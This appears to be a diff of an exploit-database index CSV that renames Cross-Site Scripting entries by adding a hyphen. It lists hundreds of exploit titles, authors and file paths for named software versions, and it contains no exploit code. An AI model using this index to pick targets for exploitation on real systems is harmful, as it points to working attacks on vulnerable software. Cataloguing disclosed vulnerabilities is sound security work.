26069,platforms/asp/webapps/26069.txt,"Naxtor E-directory 1.0 Message.ASP Cross-Site Scripting Vulnerability",2005-08-03,basher13,asp,webapps,0 26070,platforms/asp/webapps/26070.txt,"Naxtor E-directory 1.0 Default.ASP SQL Injection Vulnerability",2005-08-03,basher13,asp,webapps,0 -26071,platforms/multiple/remote/26071.txt,"NetworkActiv Web Server 1.0/2.0/3.0/3.5 Cross-Site Scripting Vulnerability",2005-08-04,"Secunia Research",multiple,remote,0 +26071,platforms/multiple/remote/26071.txt,"NetworkActiv Web Server 1.0/2.0/3.0/3.5 - Cross-Site Scripting Vulnerability",2005-08-04,"Secunia Research",multiple,remote,0 26072,platforms/php/webapps/26072.txt,"PortailPHP 2.4 Index.PHP SQL Injection Vulnerability",2005-08-04,abducter_minds@yahoo.com,php,webapps,0 26073,platforms/jsp/webapps/26073.txt,"Resin Application Server 4.0.36 Source Code Disclosure Vulnerability",2013-06-10,LiquidWorm,jsp,webapps,0 26075,platforms/hardware/remote/26075.txt,"MobileIron Virtual Smartphone Platform Privilege Escalation Exploit",2013-06-10,prdelka,hardware,remote,0 @@ -23427,7 +23427,7 @@ id,file,description,date,author,platform,type,port 26351,platforms/asp/webapps/26351.txt,"Comersus BackOffice Plus Multiple Cross-Site Scripting Vulnerabilities",2005-10-17,Lostmon,asp,webapps,0 26352,platforms/php/local/26352.php,"PHP 5.0.5 Safedir Restriction Bypass Vulnerabilities",2005-10-17,anonymous,php,local,0 26353,platforms/linux/local/26353.txt,"Linux Kernel <= 2.6 - Console Keymap Local Command Injection Vulnerability",2005-10-17,"Rudolf Polzer",linux,local,0 -26354,platforms/jsp/webapps/26354.txt,"NetFlow Analyzer 4 Cross-Site Scripting Vulnerability",2005-10-18,why@nsfocus.com,jsp,webapps,0 +26354,platforms/jsp/webapps/26354.txt,"NetFlow Analyzer 4 - Cross-Site Scripting Vulnerability",2005-10-18,why@nsfocus.com,jsp,webapps,0 26355,platforms/php/webapps/26355.txt,"MySource 2.14 upgrade_in_progress_backend.php target_url Parameter XSS",2005-10-18,"Secunia Research",php,webapps,0 26356,platforms/php/webapps/26356.txt,"MySource 2.14 insert_table.php bgcolor Parameter XSS",2005-10-18,"Secunia Research",php,webapps,0 26357,platforms/php/webapps/26357.txt,"MySource 2.14 edit_table_cell_props.php bgcolor Parameter XSS",2005-10-18,"Secunia Research",php,webapps,0 @@ -23561,7 +23561,7 @@ id,file,description,date,author,platform,type,port 26488,platforms/php/webapps/26488.txt,"SAP Web Application Server 6.x/7.0 URI Redirection Vulnerability",2005-11-09,"Leandro Meiners",php,webapps,0 26489,platforms/linux/local/26489.c,"Linux Kernel 2.6.x - Sysctl Unregistration Local Denial of Service Vulnerability",2005-11-09,"Rémi Denis-Courmont",linux,local,0 26490,platforms/php/webapps/26490.txt,"TikiWiki 1.9 Tiki-view_forum_thread.PHP Cross-Site Scripting Vulnerability",2005-11-09,"Moritz Naumann",php,webapps,0 -26491,platforms/windows/remote/26491.txt,"Antville 1.1 Cross-Site Scripting Vulnerability",2005-11-09,"Moritz Naumann",windows,remote,0 +26491,platforms/windows/remote/26491.txt,"Antville 1.1 - Cross-Site Scripting Vulnerability",2005-11-09,"Moritz Naumann",windows,remote,0 26492,platforms/linux/local/26492.txt,"Emacs 2.1 - Local Variable Arbitrary Command Execution Vulnerability",2002-12-31,"Georgi Guninski",linux,local,0 26493,platforms/windows/remote/26493.py,"Bifrost 1.2.1 - Remote Buffer OverFlow",2013-06-30,"Mohamed Clay",windows,remote,0 26494,platforms/windows/remote/26494.py,"Bifrost 1.2d - Remote Buffer Overflow",2013-06-30,"Mohamed Clay",windows,remote,0 @@ -23857,7 +23857,7 @@ id,file,description,date,author,platform,type,port 26794,platforms/php/webapps/26794.txt,"Plogger Beta 2 index.php Multiple Parameter XSS",2005-12-13,r0t,php,webapps,0 26795,platforms/php/webapps/26795.txt,"VCD-db 0.9x search.php by Parameter SQL Injection",2005-12-13,r0t3d3Vil,php,webapps,0 26796,platforms/php/webapps/26796.txt,"VCD-db 0.9x Search Module batch Parameter XSS",2005-12-13,r0t3d3Vil,php,webapps,0 -26797,platforms/php/webapps/26797.txt,"PHP JackKnife 2.21 Cross-Site Scripting Vulnerability",2005-12-13,r0t3d3Vil,php,webapps,0 +26797,platforms/php/webapps/26797.txt,"PHP JackKnife 2.21 - Cross-Site Scripting Vulnerability",2005-12-13,r0t3d3Vil,php,webapps,0 26798,platforms/php/webapps/26798.txt,"Mantis 0.x/1.0 View_filters_page.PHP Cross-Site Scripting Vulnerability",2005-12-13,r0t,php,webapps,0 26799,platforms/php/webapps/26799.txt,"Snipe Gallery 3.1.4 view.php gallery_id Parameter SQL Injection",2005-12-13,r0t,php,webapps,0 26800,platforms/php/webapps/26800.txt,"Snipe Gallery 3.1.4 image.php image_id Parameter SQL Injection",2005-12-13,r0t,php,webapps,0 @@ -23904,12 +23904,12 @@ id,file,description,date,author,platform,type,port 26842,platforms/cgi/webapps/26842.txt,"Sitenet BBS 2.0 netboardr.cgi Multiple Parameter XSS",2005-12-15,r0t3d3Vil,cgi,webapps,0 26843,platforms/cgi/webapps/26843.txt,"Sitenet BBS 2.0 - search.cgi cid Parameter XSS",2005-12-15,r0t3d3Vil,cgi,webapps,0 26844,platforms/php/webapps/26844.txt,"DCForum 1-6 DCBoard Script Page Parameter Cross-Site Scripting Vulnerability",2005-12-15,r0t3d3Vil,php,webapps,0 -26845,platforms/cgi/webapps/26845.txt,"Atlant Pro 8.0.9 Cross-Site Scripting Vulnerabilities",2005-12-15,r0t3d3Vil,cgi,webapps,0 +26845,platforms/cgi/webapps/26845.txt,"Atlant Pro 8.0.9 - Cross-Site Scripting Vulnerabilities",2005-12-15,r0t3d3Vil,cgi,webapps,0 26846,platforms/cgi/webapps/26846.txt,"AltantForum 4.0.2 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-15,r0t3d3Vil,cgi,webapps,0 26847,platforms/cgi/webapps/26847.txt,"eDatCat 3.0 EDCstore.PL Cross-Site Scripting Vulnerability",2005-12-15,r0t3d3Vil,cgi,webapps,0 26848,platforms/cgi/webapps/26848.txt,"Soft4e ECW-Cart 2.0.3 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-15,r0t3d3Vil,cgi,webapps,0 -26849,platforms/cgi/webapps/26849.txt,"ECTOOLS Onlineshop 1.0 Cross-Site Scripting Vulnerability",2005-12-15,r0t3d3Vil,cgi,webapps,0 -26850,platforms/cgi/webapps/26850.txt,"PPCal Shopping Cart 3.3 Cross-Site Scripting Vulnerability",2005-12-15,r0t3d3Vil,cgi,webapps,0 +26849,platforms/cgi/webapps/26849.txt,"ECTOOLS Onlineshop 1.0 - Cross-Site Scripting Vulnerability",2005-12-15,r0t3d3Vil,cgi,webapps,0 +26850,platforms/cgi/webapps/26850.txt,"PPCal Shopping Cart 3.3 - Cross-Site Scripting Vulnerability",2005-12-15,r0t3d3Vil,cgi,webapps,0 26851,platforms/cgi/webapps/26851.txt,"Kryptronic ClickCartPro 5.1/5.2 CP-APP.CGI Cross-Site Scripting Vulnerability",2005-12-15,r0t3d3Vil,cgi,webapps,0 26852,platforms/cgi/webapps/26852.txt,"Dick Copits PDEstore 1.8 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-15,r0t3d3Vil,cgi,webapps,0 26853,platforms/php/webapps/26853.txt,"ezDatabase 2.1.2 index.php p Parameter Local File Inclusion",2005-12-16,r0t3d3Vil,php,webapps,0 @@ -23936,12 +23936,12 @@ id,file,description,date,author,platform,type,port 26874,platforms/asp/webapps/26874.txt,"Acidcat CMS 2.1.13 acidcat.mdb Remote Information Disclosure",2005-12-19,admin@hamid.ir,asp,webapps,0 26875,platforms/asp/webapps/26875.txt,"allinta CMS 2.3.2 faq.asp s Parameter XSS",2005-12-19,r0t3d3Vil,asp,webapps,0 26876,platforms/asp/webapps/26876.txt,"allinta CMS 2.3.2 - search.asp searchQuery Parameter XSS",2005-12-19,r0t3d3Vil,asp,webapps,0 -26877,platforms/php/webapps/26877.txt,"Box UK Amaxus CMS 3.0 Cross-Site Scripting Vulnerability",2005-12-19,r0t3d3Vil,php,webapps,0 +26877,platforms/php/webapps/26877.txt,"Box UK Amaxus CMS 3.0 - Cross-Site Scripting Vulnerability",2005-12-19,r0t3d3Vil,php,webapps,0 26878,platforms/php/webapps/26878.txt,"Caravel CMS 3.0 Beta 1 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-19,r0t3d3Vil,php,webapps,0 26879,platforms/php/webapps/26879.txt,"Cofax 2.0 - Search.HTM Cross-Site Scripting Vulnerability",2005-12-19,r0t3d3Vil,php,webapps,0 26880,platforms/php/webapps/26880.txt,"FLIP 0.9.0.1029 - text.php name Parameter XSS",2005-12-19,r0t3d3Vil,php,webapps,0 26881,platforms/php/webapps/26881.txt,"FLIP 0.9.0.1029 - forum.php frame Parameter XSS",2005-12-19,r0t3d3Vil,php,webapps,0 -26882,platforms/cfm/webapps/26882.txt,"Hot Banana Web Content Management Suite 5.3 Cross-Site Scripting Vulnerability",2005-12-19,r0t3d3Vil,cfm,webapps,0 +26882,platforms/cfm/webapps/26882.txt,"Hot Banana Web Content Management Suite 5.3 - Cross-Site Scripting Vulnerability",2005-12-19,r0t3d3Vil,cfm,webapps,0 26883,platforms/php/webapps/26883.txt,"Libertas Enterprise CMS 3.0 Index.PHP Cross-Site Scripting Vulnerability",2005-12-19,r0t3d3Vil,php,webapps,0 26884,platforms/php/webapps/26884.txt,"Liferay Portal Enterprise 3.6.1 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-19,r0t3d3Vil,php,webapps,0 26885,platforms/php/webapps/26885.txt,"Lighthouse CMS 1.1 - Search Cross-Site Scripting Vulnerability",2005-12-19,r0t3d3Vil,php,webapps,0 @@ -23954,7 +23954,7 @@ id,file,description,date,author,platform,type,port 26892,platforms/windows/dos/26892.py,"Kate's Video Toolkit 7.0 - (.wav) Crash PoC",2013-07-16,ariarat,windows,dos,0 26893,platforms/php/webapps/26893.txt,"Dell Kace 1000 SMA 5.4.70402 - Persistent XSS Vulnerabilities",2013-07-16,Vulnerability-Lab,php,webapps,0 26894,platforms/php/webapps/26894.txt,"Saurus CMS 4.7.1 - Multiple Vulnerabilities",2013-07-16,waraxe,php,webapps,0 -26895,platforms/php/webapps/26895.txt,"Magnolia Search Module 2.1 Cross-Site Scripting Vulnerability",2005-12-19,r0t3d3Vil,php,webapps,0 +26895,platforms/php/webapps/26895.txt,"Magnolia Search Module 2.1 - Cross-Site Scripting Vulnerability",2005-12-19,r0t3d3Vil,php,webapps,0 26896,platforms/php/webapps/26896.txt,"ContentServ 3.0/3.1/4.0 Index.PHP SQL Injection Vulnerability",2005-12-19,r0t,php,webapps,0 26897,platforms/php/webapps/26897.txt,"Direct News 4.9 Index.PHP SQL Injection Vulnerability",2005-12-19,r0t,php,webapps,0 26898,platforms/php/webapps/26898.txt,"ODFaq 2.1 FAQ.PHP SQL Injection Vulnerability",2005-12-19,r0t,php,webapps,0 @@ -23984,7 +23984,7 @@ id,file,description,date,author,platform,type,port 26922,platforms/multiple/dos/26922.pl,"Interaction SIP Proxy 3.0 - Remote Heap Corruption Denial of Service Vulnerability",2005-12-21,"Behrang Fouladi",multiple,dos,0 26923,platforms/php/webapps/26923.txt,"Beehive Forum 0.6.2 - Multiple HTML Injection Vulnerabilities",2005-12-21,"Alireza Hassani",php,webapps,0 26924,platforms/jsp/webapps/26924.txt,"OpenEdit 4.0 Results.HTML Cross-Site Scripting Vulnerability",2005-12-21,r0t3d3Vil,jsp,webapps,0 -26925,platforms/php/webapps/26925.txt,"Papaya CMS 4.0.4 Cross-Site Scripting Vulnerability",2005-12-21,r0t3d3Vil,php,webapps,0 +26925,platforms/php/webapps/26925.txt,"Papaya CMS 4.0.4 - Cross-Site Scripting Vulnerability",2005-12-21,r0t3d3Vil,php,webapps,0 26926,platforms/asp/webapps/26926.txt,"PortalApp 3.3/4.0 Login.ASP Cross-Site Scripting Vulnerability",2005-12-21,r0t,asp,webapps,0 26927,platforms/asp/webapps/26927.txt,"SiteEnable 3.3 Login.ASP Cross-Site Scripting Vulnerability",2005-12-21,r0t,asp,webapps,0 26928,platforms/asp/webapps/26928.txt,"IntranetApp 3.3 login.asp ret_page Parameter XSS",2005-12-21,r0t,asp,webapps,0 @@ -24045,7 +24045,7 @@ id,file,description,date,author,platform,type,port 26983,platforms/php/webapps/26983.txt,"IceWarp Universal WebMail /mail/index.html lang_settings Parameter Remote File Inclusion",2005-12-27,"Tan Chew Keong",php,webapps,0 26984,platforms/php/webapps/26984.txt,"IceWarp Universal WebMail /mail/include.html - Crafted HTTP_USER_AGENT Arbitrary File Access",2005-12-27,"Tan Chew Keong",php,webapps,0 26985,platforms/windows/dos/26985.txt,"Microsoft Internet Explorer 5.0.1 HTML Parsing Denial of Service Vulnerabilities",2005-12-27,"Christian Deneke",windows,dos,0 -26986,platforms/cfm/webapps/26986.txt,"PaperThin CommonSpot Content Server 4.5 Cross-Site Scripting Vulnerability",2005-12-23,r0t3d3Vil,cfm,webapps,0 +26986,platforms/cfm/webapps/26986.txt,"PaperThin CommonSpot Content Server 4.5 - Cross-Site Scripting Vulnerability",2005-12-23,r0t3d3Vil,cfm,webapps,0 26987,platforms/java/webapps/26987.txt,"FatWire UpdateEngine 6.2 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-27,r0t3d3Vil,java,webapps,0 26988,platforms/php/webapps/26988.txt,"Koobi 5.0 BBCode URL Tag Script Injection Vulnerability",2005-12-28,"kurdish hackers team",php,webapps,0 26989,platforms/php/webapps/26989.txt,"GMailSite 1.0.x - Cross-Site Scripting Vulnerability",2005-12-29,Lostmon,php,webapps,0 @@ -24204,7 +24204,7 @@ id,file,description,date,author,platform,type,port 27146,platforms/php/webapps/27146.txt,"sPaiz-Nuke - Modules.PHP Cross-Site Scripting Vulnerability",2006-01-30,night_warrior771,php,webapps,0 27147,platforms/php/webapps/27147.txt,"PmWiki 2.1 - Multiple Input Validation Vulnerabilities",2006-01-30,aScii,php,webapps,0 27148,platforms/php/webapps/27148.txt,"Nuked-klaN 1.7 Index.PHP Cross-Site Scripting Vulnerability",2006-01-30,night_warrior771,php,webapps,0 -27149,platforms/php/webapps/27149.txt,"Ashwebstudio Ashnews 0.83 Cross-Site Scripting Vulnerability",2006-01-30,0o_zeus_o0,php,webapps,0 +27149,platforms/php/webapps/27149.txt,"Ashwebstudio Ashnews 0.83 - Cross-Site Scripting Vulnerability",2006-01-30,0o_zeus_o0,php,webapps,0 27150,platforms/linux/remote/27150.txt,"Mozilla Firefox 1.0/1.5 XBL -MOZ-BINDING Property Cross-Domain Scripting Vulnerability",2006-01-30,"Chris Thomas",linux,remote,0 27151,platforms/asp/webapps/27151.txt,"Daffodil CRM 1.5 Userlogin.ASP SQL Injection Vulnerability",2006-01-30,preben@watchcom.no,asp,webapps,0 27152,platforms/php/webapps/27152.txt,"BrowserCRM - Results.PHP Cross-Site Scripting Vulnerability",2006-01-31,preben@watchcom.no,php,webapps,0 @@ -24213,7 +24213,7 @@ id,file,description,date,author,platform,type,port 27155,platforms/php/webapps/27155.txt,"MyBB 1.0/1.1 Index.PHP Referrer Cookie SQL Injection Vulnerability",2006-01-31,Devil-00,php,webapps,0 27156,platforms/php/webapps/27156.txt,"SZUserMgnt 1.4 Username Parameter SQL Injection Vulnerability",2006-02-01,"Aliaksandr Hartsuyeu",php,webapps,0 27157,platforms/php/webapps/27157.txt,"SPIP 1.8/1.9 - Multiple SQL Injection Vulnerabilities",2006-02-01,Siegfried,php,webapps,0 -27158,platforms/php/webapps/27158.txt,"SPIP 1.8/1.9 Index.PHP3 Cross-Site Scripting Vulnerability",2006-02-01,Siegfried,php,webapps,0 +27158,platforms/php/webapps/27158.txt,"SPIP 1.8/1.9 Index.PHP3 - Cross-Site Scripting Vulnerability",2006-02-01,Siegfried,php,webapps,0 27159,platforms/multiple/dos/27159.txt,"Fcron 3.0 - Convert-FCronTab Local Buffer Overflow Vulnerability",2006-02-01,"Adam Zabrocki",multiple,dos,0 27160,platforms/asp/webapps/27160.txt,"SoftMaker Shop - Multiple Cross-Site Scripting Vulnerabilities",2006-02-02,preben@watchcom.no,asp,webapps,0 27161,platforms/asp/webapps/27161.txt,"CyberShop Ultimate E-commerce Multiple Cross-Site Scripting Vulnerabilities",2006-02-02,B3g0k,asp,webapps,0 @@ -24262,7 +24262,7 @@ id,file,description,date,author,platform,type,port 27206,platforms/php/webapps/27206.txt,"XMB Forum 1.8/1.9 u2u.php username Parameter XSS",2006-02-13,"James Bercegay",php,webapps,0 27207,platforms/php/webapps/27207.txt,"Clever Copy 2.0/3.0 - Multiple HTML Injection Vulnerabilities",2006-02-13,"Aliaksandr Hartsuyeu",php,webapps,0 27208,platforms/php/webapps/27208.txt,"PHPNuke 6.x/7.x Header.PHP Pagetitle Parameter Cross-Site Scripting Vulnerability",2006-02-13,"Janek Vind",php,webapps,0 -27209,platforms/php/webapps/27209.txt,"Gastebuch 1.3.2 Cross-Site Scripting Vulnerability",2006-02-13,"Micha Borrmann",php,webapps,0 +27209,platforms/php/webapps/27209.txt,"Gastebuch 1.3.2 - Cross-Site Scripting Vulnerability",2006-02-13,"Micha Borrmann",php,webapps,0 27210,platforms/multiple/dos/27210.txt,"eStara SoftPhone 3.0.1 - SIP SDP Message Handling Format String DoS",2006-02-14,ZwelL,multiple,dos,0 27211,platforms/multiple/dos/27211.txt,"eStara SoftPhone 3.0.1 SIP Packet Multiple Malformed Field DoS",2006-02-14,ZwelL,multiple,dos,0 27212,platforms/multiple/dos/27212.txt,"Isode M-Vault Server 11.3 LDAP Memory Corruption Vulnerability",2006-02-14,"Evgeny Legerov",multiple,dos,0 @@ -24489,7 +24489,7 @@ id,file,description,date,author,platform,type,port 27440,platforms/php/webapps/27440.txt,"Invision Power Services Invision Board 2.0.4 Mail Action MID Parameter XSS",2006-03-17,Mr.SNAKE,php,webapps,0 27441,platforms/php/webapps/27441.txt,"Invision Power Services Invision Board 2.0.4 Help Action HID Parameter XSS",2006-03-17,Mr.SNAKE,php,webapps,0 27442,platforms/php/webapps/27442.txt,"Invision Power Services Invision Board 2.0.4 Members Action Multiple Parameter XSS",2006-03-17,Mr.SNAKE,php,webapps,0 -27443,platforms/php/webapps/27443.txt,"ExtCalendar 1.0 Cross-Site Scripting Vulnerabilities",2006-03-18,Soothackers,php,webapps,0 +27443,platforms/php/webapps/27443.txt,"ExtCalendar 1.0 - Cross-Site Scripting Vulnerabilities",2006-03-18,Soothackers,php,webapps,0 27444,platforms/php/webapps/27444.txt,"Woltlab Burning Board 2.3.4 Class_DB_MySQL.PHP Cross-Site Scripting Vulnerability",2006-03-18,r57shell,php,webapps,0 27445,platforms/php/webapps/27445.txt,"MusicBox 2.3 index.php Multiple Parameter SQL Injection",2006-03-18,Linux_Drox,php,webapps,0 27446,platforms/php/webapps/27446.txt,"MusicBox 2.3 index.php Multiple Parameter XSS",2006-03-18,Linux_Drox,php,webapps,0 @@ -24528,7 +24528,7 @@ id,file,description,date,author,platform,type,port 27479,platforms/asp/webapps/27479.txt,"Toast Forums 1.6 Toast.ASP Multiple Cross-Site Scripting Vulnerabilities",2006-03-27,r0t,asp,webapps,0 27480,platforms/asp/webapps/27480.txt,"Online Quiz System - prequiz.asp exam Parameter XSS",2006-03-27,r0t,asp,webapps,0 27481,platforms/asp/webapps/27481.txt,"Online Quiz System - student.asp msg Parameter XSS",2006-03-27,r0t,asp,webapps,0 -27482,platforms/asp/webapps/27482.txt,"Caloris Planitia Technologies School Management System 1.0 Cross-Site Scripting Vulnerability",2006-03-27,r0t,asp,webapps,0 +27482,platforms/asp/webapps/27482.txt,"Caloris Planitia Technologies School Management System 1.0 - Cross-Site Scripting Vulnerability",2006-03-27,r0t,asp,webapps,0 27483,platforms/php/webapps/27483.txt,"Pixel Motion - admin/index.php Multiple Field SQL Injection",2006-03-27,DaBDouB-MoSiKaR,php,webapps,0 27484,platforms/php/webapps/27484.txt,"Pixel Motion - index.php date Parameter SQL Injection",2006-03-27,DaBDouB-MoSiKaR,php,webapps,0 27485,platforms/php/webapps/27485.txt,"DSLogin 1.0 Index.PHP Multiple SQL Injection Vulnerabilities",2006-03-27,"Aliaksandr Hartsuyeu",php,webapps,0 @@ -24593,7 +24593,7 @@ id,file,description,date,author,platform,type,port 27548,platforms/php/webapps/27548.txt,"Claroline 1.x Rqmkhtml.PHP Information Disclosure Vulnerability",2006-03-31,rgod,php,webapps,0 27549,platforms/php/webapps/27549.txt,"Claroline 1.x RQMKHTML.PHP Cross-Site Scripting Vulnerability",2006-03-31,rgod,php,webapps,0 27550,platforms/php/webapps/27550.txt,"blank'n'berg 0.2 - Directory Traversal Vulnerability",2006-03-31,"Amine ABOUD",php,webapps,0 -27551,platforms/php/webapps/27551.txt,"Blank'N'Berg 0.2 Cross-Site Scripting Vulnerability",2006-03-31,"Amine ABOUD",php,webapps,0 +27551,platforms/php/webapps/27551.txt,"Blank'N'Berg 0.2 - Cross-Site Scripting Vulnerability",2006-03-31,"Amine ABOUD",php,webapps,0 27552,platforms/asp/webapps/27552.txt,"ISP Site Man - Admin_Login.ASP SQL Injection Vulnerability",2006-04-01,s3rv3r_hack3r,asp,webapps,0 27553,platforms/windows/dos/27553.py,"onehttpd 0.7 - Denial of Service",2013-08-13,superkojiman,windows,dos,8080 27554,platforms/windows/remote/27554.py,"MinaliC Webserver 2.0.0 - Buffer Overflow (Egghunter)",2013-08-13,PuN1sh3r,windows,remote,8080 @@ -24624,7 +24624,7 @@ id,file,description,date,author,platform,type,port 27579,platforms/php/webapps/27579.txt,"Bitweaver CMS 1.3 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-07,KaDaL-X,php,webapps,0 27580,platforms/php/webapps/27580.txt,"vBulletin 3.5.1 Vbugs.PHP Cross-Site Scripting Vulnerability",2006-04-07,r0t,php,webapps,0 27581,platforms/linux/dos/27581.txt,"Tony Cook Imager 0.4x JPEG and TGA Images Denial of Service Vulnerability",2006-04-07,"Kjetil Kjernsmo",linux,dos,0 -27582,platforms/php/webapps/27582.txt,"AWeb's Banner Generator 3.0 Cross-Site Scripting Vulnerability",2006-04-07,benozor77,php,webapps,0 +27582,platforms/php/webapps/27582.txt,"AWeb's Banner Generator 3.0 - Cross-Site Scripting Vulnerability",2006-04-07,benozor77,php,webapps,0 27583,platforms/cgi/webapps/27583.txt,"TalentSoft Web+ Shop 5.0 Deptname Parameter Cross-Site Scripting Vulnerability",2006-04-07,r0t,cgi,webapps,0 27584,platforms/php/webapps/27584.txt,"JBook 1.3 Index.PHP Cross-Site Scripting Vulnerability",2006-04-10,Psych0,php,webapps,0 27585,platforms/php/webapps/27585.txt,"phpMyForum 4.0 index.php page Parameter XSS",2006-04-10,Psych0,php,webapps,0 @@ -24971,7 +24971,7 @@ id,file,description,date,author,platform,type,port 27942,platforms/hardware/dos/27942.txt,"AVTECH DVR Firmware 1017-1003-1009-1003 - Multiple Vulnerabilities",2013-08-29,"Core Security",hardware,dos,0 27943,platforms/windows/remote/27943.txt,"Oracle Java ByteComponentRaster.verify() Memory Corruption",2013-08-29,"Packet Storm",windows,remote,0 27944,platforms/osx/local/27944.rb,"Mac OS X Sudo Password Bypass",2013-08-29,metasploit,osx,local,0 -27945,platforms/asp/webapps/27945.txt,"Enigma Haber 4.2 Cross-Site Scripting Vulnerability",2006-06-02,The_BeKiR,asp,webapps,0 +27945,platforms/asp/webapps/27945.txt,"Enigma Haber 4.2 - Cross-Site Scripting Vulnerability",2006-06-02,The_BeKiR,asp,webapps,0 27946,platforms/php/webapps/27946.txt,"Portix-PHP 2-0.3.2 Portal Multiple Cross-Site Scripting Vulnerabilities",2006-06-02,SpC-x,php,webapps,0 27947,platforms/php/webapps/27947.txt,"TAL RateMyPic 1.0 - Multiple Input Validation Vulnerabilities",2006-06-02,Luny,php,webapps,0 27948,platforms/php/webapps/27948.txt,"Squirrelmail 1.4.x Redirect.PHP Local File Include Vulnerability",2006-06-02,brokejunker,php,webapps,0 @@ -25130,7 +25130,7 @@ id,file,description,date,author,platform,type,port 28107,platforms/php/webapps/28107.txt,"Cpanel 10 Select.HTML Cross-Site Scripting Vulnerability",2006-06-26,preth00nker,php,webapps,0 28108,platforms/php/webapps/28108.txt,"MyMail 1.0 Login.PHP Cross-Site Scripting Vulnerability",2006-06-26,botan,php,webapps,0 28109,platforms/php/webapps/28109.txt,"Usenet 0.5 Index.PHP Cross-Site Scripting Vulnerability",2006-06-23,Luny,php,webapps,0 -28110,platforms/php/webapps/28110.txt,"MVNForum Activatemember 1.0 Cross-Site Scripting Vulnerability",2006-06-26,r0t,php,webapps,0 +28110,platforms/php/webapps/28110.txt,"MVNForum Activatemember 1.0 - Cross-Site Scripting Vulnerability",2006-06-26,r0t,php,webapps,0 28111,platforms/php/webapps/28111.txt,"OpenGuestbook 0.5 header.php title Parameter XSS",2006-06-26,simo64,php,webapps,0 28112,platforms/php/webapps/28112.txt,"OpenGuestbook 0.5 view.php offset Parameter SQL Injection",2006-06-26,simo64,php,webapps,0 28113,platforms/php/webapps/28113.txt,"cPanel 10.8.1/10.8.2 OnMouseover Cross-Site Scripting Vulnerability",2006-06-27,MexHackTeam.org,php,webapps,0 @@ -25165,7 +25165,7 @@ id,file,description,date,author,platform,type,port 28143,platforms/php/webapps/28143.pl,"SturGeoN Upload Arbitrary File Upload Vulnerability",2006-07-01,"Jihad BENABRA",php,webapps,0 28144,platforms/windows/dos/28144.txt,"Microsoft Internet Explorer 6.0 OutlookExpress.AddressBook Denial of Service Vulnerability",2006-07-01,hdm,windows,dos,0 28145,platforms/windows/dos/28145.html,"Microsoft Internet Explorer 6.0 ADODB.Recordset Filter Property Denial of Service Vulnerability",2006-07-03,hdm,windows,dos,0 -28146,platforms/php/webapps/28146.txt,"Vincent Leclercq News 5.2 Cross-Site Scripting Vulnerabilities",2006-07-03,DarkFig,php,webapps,0 +28146,platforms/php/webapps/28146.txt,"Vincent Leclercq News 5.2 - Cross-Site Scripting Vulnerabilities",2006-07-03,DarkFig,php,webapps,0 28147,platforms/php/webapps/28147.txt,"Plume CMS 1.0.4 index.php _PX_config[manager_path] Parameter Remote File Inclusion",2007-07-03,CrAsh_oVeR_rIdE,php,webapps,0 28148,platforms/php/webapps/28148.txt,"Plume CMS 1.0.4 rss.php _PX_config[manager_path] Parameter Remote File Inclusion",2007-07-03,CrAsh_oVeR_rIdE,php,webapps,0 28149,platforms/php/webapps/28149.txt,"Plume CMS 1.0.4 - search.php _PX_config[manager_path] Parameter Remote File Inclusion",2006-07-03,CrAsh_oVeR_rIdE,php,webapps,0 @@ -25574,7 +25574,7 @@ id,file,description,date,author,platform,type,port 28571,platforms/php/webapps/28571.txt,"DCP-Portal 6.0 admin/inc/footer.inc.php Multiple Parameter XSS",2006-09-14,"HACKERS PAL",php,webapps,0 28572,platforms/php/webapps/28572.txt,"DCP-Portal 6.0 admin/inc/header.inc.php Multiple Parameter XSS",2006-09-14,"HACKERS PAL",php,webapps,0 28573,platforms/php/webapps/28573.txt,"DCP-Portal 6.0 login.php username Parameter SQL Injection",2006-09-14,"HACKERS PAL",php,webapps,0 -28574,platforms/php/webapps/28574.txt,"Blojsom 2.31 Cross-Site Scripting Vulnerability",2006-09-14,"Avinash Shenoi",php,webapps,0 +28574,platforms/php/webapps/28574.txt,"Blojsom 2.31 - Cross-Site Scripting Vulnerability",2006-09-14,"Avinash Shenoi",php,webapps,0 28575,platforms/php/webapps/28575.txt,"PhotoPost Pro 4.6 - Multiple Remote File Include Vulnerabilities",2006-09-14,"Saudi Hackrz",php,webapps,0 28576,platforms/osx/local/28576.txt,"Apple Mac OS X 10.x KExtLoad Format String Weakness",2006-09-14,"Adriel T. Desautels",osx,local,0 28577,platforms/asp/webapps/28577.txt,"ClickBlog! 2.0 Default.ASP SQL Injection Vulnerability",2006-09-14,ajann,asp,webapps,0 @@ -25717,7 +25717,7 @@ id,file,description,date,author,platform,type,port 28722,platforms/php/webapps/28722.txt,"Red Mombin 0.7 process_login.php Unspecified XSS",2006-09-22,"Armorize Technologies",php,webapps,0 28723,platforms/php/webapps/28723.txt,"Aanval 7.1 build 70151 - Multiple Vulnerabilities",2013-10-04,xistence,php,webapps,80 28724,platforms/windows/remote/28724.rb,"SIEMENS Solid Edge ST4 SEListCtrlX ActiveX Remote Code Execution",2013-10-04,metasploit,windows,remote,0 -28725,platforms/multiple/remote/28725.txt,"SAP Internet Transaction Server 6.10/6.20 Cross-Site Scripting Vulnerability",2006-09-28,"ILION Research",multiple,remote,0 +28725,platforms/multiple/remote/28725.txt,"SAP Internet Transaction Server 6.10/6.20 - Cross-Site Scripting Vulnerability",2006-09-28,"ILION Research",multiple,remote,0 28726,platforms/multiple/dos/28726.pl,"OpenSSL SSLv2 - Null Pointer Dereference Client Denial of Service Vulnerability",2006-09-28,"Noam Rathaus",multiple,dos,0 28727,platforms/php/webapps/28727.txt,"Les Visiteurs 2.0 - Multiple Remote File Include Vulnerabilities",2006-09-28,D_7J,php,webapps,0 28728,platforms/php/webapps/28728.txt,"Geotarget Script.PHP Remote File Include Vulnerability",2006-09-29,"RaVeR shi mozi",php,webapps,0 @@ -25903,7 +25903,7 @@ id,file,description,date,author,platform,type,port 28909,platforms/php/webapps/28909.txt,"IF-CMS Index.PHP Cross-Site Scripting Vulnerability",2006-11-04,"Benjamin Moss",php,webapps,0 28910,platforms/php/webapps/28910.pl,"PHPKit 1.6.1 Popup.PHP SQL Injection Vulnerability",2006-11-04,x23,php,webapps,0 28911,platforms/solaris/dos/28911.txt,"Sun Solaris 10 UFS Local Denial of Service Vulnerability",2006-11-04,LMH,solaris,dos,0 